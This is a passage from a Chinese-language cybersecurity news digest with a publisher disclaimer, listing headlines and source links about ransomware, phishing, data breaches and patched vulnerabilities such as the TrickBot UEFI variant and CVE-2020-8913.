https://securityaffairs.co/wordpress/111980/deep-web/pfizer-covid19-vaccine-darknet.html 6、MetaMask网络钓鱼通过谷歌广告窃取用户加密货币 https://www.bleepingcomputer.com/news/security/metamask-phishing-steals-cryptocurrency-wallets-via-google-ads/ 7、暗网公开320万条在线电视服务Pluto TV用户记录 https://www.technadu.com/thousands-pluto-tv-users-confirm-cybersecurity-incident/229516/ 8、伊朗黑客获取了以色列水利设施ICS访问权 https://securityaffairs.co/wordpress/111934/ics-scada/israeli-water-facility-breached.html 9、Chrome修复了多个高危漏洞 https://threatpost.com/google_chrome_bugs_patched/161907/ 10、因未及时更新Play Core库数亿安卓用户受CVE-2020-8913漏洞影响 https://securityaffairs.co/wordpress/111911/mobile-2/android-cve-2020-8913-flaw.html

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、GitHub表示某些软件生态系统中的漏洞需要数年才能解决 https://www.securityweek.com/github-says-vulnerabilities-some-ecosystems-take-years-fix 2、新版本的TrickBot可以篡改UEFI / BIOS固件 https://www.zdnet.com/article/new-trickbot-version-can-tamper-with-uefibios-firmware/ 3、施乐发布修复程序解决DocuShare中漏洞 https://threatpost.com/xerox-docushare-bugs/161791/ 4、美国房地产巨头Long & Foster遭勒索攻击泄露了客户信息 https://www.technadu.com/long-and-foster-suffered-catastrophic-data-breach-incident/228685/ 5、IBM X-Force专家警告黑客攻击COVID-19疫苗冷链相关组织 https://securityaffairs.co/wordpress/111858/apt/covid-19-cold-chain-attacks.html 6、Clop勒索运营商声称从E-Land Retail窃取了200W张信用卡数据 https://securityaffairs.co/wordpress/111842/malware/clop-ransomware-e-land.html 7、攻击者使用伪装Zoom邮件窃取凭证信息 https://threatpost.com/zoom-impersonation-attacks-credentials/161718/ 8、MANRS将对BGP安全性进行改进和加强 https://www.wired.com/story/bgp-routing-manrs-google-fix/ 9、网络钓鱼使用FINRA相似域来攻击美国证券公司 https://www.bleepingcomputer.com/news/security/phishing-targets-us-brokerage-firms-using-finra-lookalike-domain 10、思科Talos报告EIP Stack Group OpENer中的DoS和代码执行漏洞 https://blog.talosintelligence.com/2020/12/vuln-spotlight-stack-group-opener-dec-2020.html